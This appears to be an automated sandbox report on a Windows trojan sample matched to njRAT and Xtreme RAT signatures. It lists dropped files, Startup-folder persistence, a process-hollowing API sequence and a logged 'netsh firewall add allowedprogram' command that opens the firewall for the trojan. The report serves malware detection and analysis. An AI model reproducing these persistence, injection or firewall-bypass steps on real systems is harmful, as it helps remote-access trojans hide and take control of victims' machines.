Source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.svchost.exe.10000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.7FW4ce2RDy.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000000.00000000.291223895.0000000010056000.00000008.00020000.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, type: MEMORY	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 00000000.00000000.291198500.0000000010001000.00000080.00020000.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000001.00000002.304153426.0000000010048000.00000040.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, type: MEMORY	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000001.00000000.293164908.0000000010048000.00000040.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_Xtreme date = 01.04.2014, filetype = exe, ver = 2.9, 3.1, 3.2, 3.5, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects Xtreme RAT, reference = http://malwareconfig.com/stats/Xtreme
Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Xtreme_Sep17_1 date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6, author = Florian Roth, description = Detects XTREME sample analyzed in September 2017, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000000.293137876.0000000010000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000000.00000000.291215045.0000000010048000.00000080.00020000.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED	Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

File created: C:\Windows\SysWOW64\562Server.exe.exe

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 100037AC appears 177 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 10003B94 appears 94 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 10003A34 appears 95 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 10006D04 appears 88 times
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: String function: 100037AC appears 177 times
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: String function: 10003B94 appears 94 times
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: String function: 10003A34 appears 95 times
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: String function: 10006D04 appears 88 times

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000649C NtdllDefWindowProc_A,	0_2_1000649C
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_100064F4 NtdllDefWindowProc_A,	0_2_100064F4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000BD14 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,	0_2_1000BD14
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000BD60 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,	0_2_1000BD60
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_10008568 VirtualFree,WriteFile,UnhookWindowsHookEx,SetFilePointer,GetFileSize,ReadFile,SetFilePointer,SetFileAttributesW,DeleteFileW,CreateFileW,WriteFile,CloseHandle,GetModuleHandleA,SetWindowsHookExW,UnhookWindowsHookEx,UnhookWindowsHookEx,GetModuleHandleA,SetWindowsHookExW,WriteFile,SetFilePointer,SetEndOfFile,NtdllDefWindowProc_A,	0_2_10008568
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000AF50 NtdllDefWindowProc_A,	0_2_1000AF50
Source: C:\Users\user\AppData\Local\Temp\System.exe	Code function: 8_2_04C01D72 NtQuerySystemInformation,	8_2_04C01D72
Source: C:\Users\user\AppData\Local\Temp\System.exe	Code function: 8_2_04C01D37 NtQuerySystemInformation,	8_2_04C01D37

Source: C:\Windows\SysWOW64\562Server.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\562Server.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.winEXE@17/7@34/0

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_100051E8 FindResourceW,SizeofResource,LoadResource,LockResource,FreeResource,

0_2_100051E8

Source: 7FW4ce2RDy.exe	Virustotal: Detection: 83%
Source: 7FW4ce2RDy.exe	ReversingLabs: Detection: 93%

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\7FW4ce2RDy.exe 'C:\Users\user\Desktop\7FW4ce2RDy.exe'
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process created: C:\Windows\SysWOW64\562Server.exe 'C:\Windows\system32\562Server.exe'
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 564
Source: C:\Windows\SysWOW64\562Server.exe	Process created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe'
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 512
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe' ..
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe' ..
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe' ..
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe	Jump to behavior
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Process created: C:\Windows\SysWOW64\562Server.exe 'C:\Windows\system32\562Server.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Process created: C:\Users\user\AppData\Local\Temp\System.exe 'C:\Users\user\AppData\Local\Temp\System.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE	Jump to behavior

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

File created: C:\Users\user\AppData\Local\Temp\x.html

Jump to behavior

Source: C:\Windows\SysWOW64\562Server.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\SysWOW64\562Server.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3156:120:WilError_01
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\HgDdsuTdPERSIST
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Mutant created: \Sessions\1\BaseNamedObjects\HgDdsuTd
Source: C:\Windows\SysWOW64\562Server.exe	Mutant created: \Sessions\1\BaseNamedObjects\301b5fcf8ce2fab8868e80b6c1f912fe

Source: C:\Users\user\AppData\Local\Temp\System.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\System.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\562Server.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 562Server.exe.0.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: System.exe.4.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.562Server.exe.1d0000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.562Server.exe.1d0000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 301b5fcf8ce2fab8868e80b6c1f912fe.exe.8.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.System.exe.3e0000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.System.exe.3e0000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.System.exe.d50000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.System.exe.d50000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.0.System.exe.3e0000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.System.exe.3e0000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 20.2.System.exe.240000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 20.0.System.exe.240000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000C038 push 1000C064h; ret	0_2_1000C05C
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000619C push 100061D4h; ret	0_2_100061CC
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_100051A0 push 100051CCh; ret	0_2_100051C4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_100099C0 push 100099ECh; ret	0_2_100099E4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000A240 push 1000A26Ch; ret	0_2_1000A264
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_100052B0 push 100052FCh; ret	0_2_100052F4
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_10004AF8 push 10004B49h; ret	0_2_10004B41
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000AB30 push 1000AB68h; ret	0_2_1000AB60
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000AB74 push 1000ABA0h; ret	0_2_1000AB98
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_10006464 push 10006490h; ret	0_2_10006488
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000BC98 push 1000BD08h; ret	0_2_1000BD00
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000A4A0 push 1000A4D3h; ret	0_2_1000A4CB
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000BCA4 push 1000BD08h; ret	0_2_1000BD00
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_1000BD14 push 1000BD08h; ret	0_2_1000BD00
Source: C:\Users\user\Desktop\7FW4ce2RDy.exe	Code function: 0_2_10004D28 push 10004D54h; ret	0_2_10004D4C
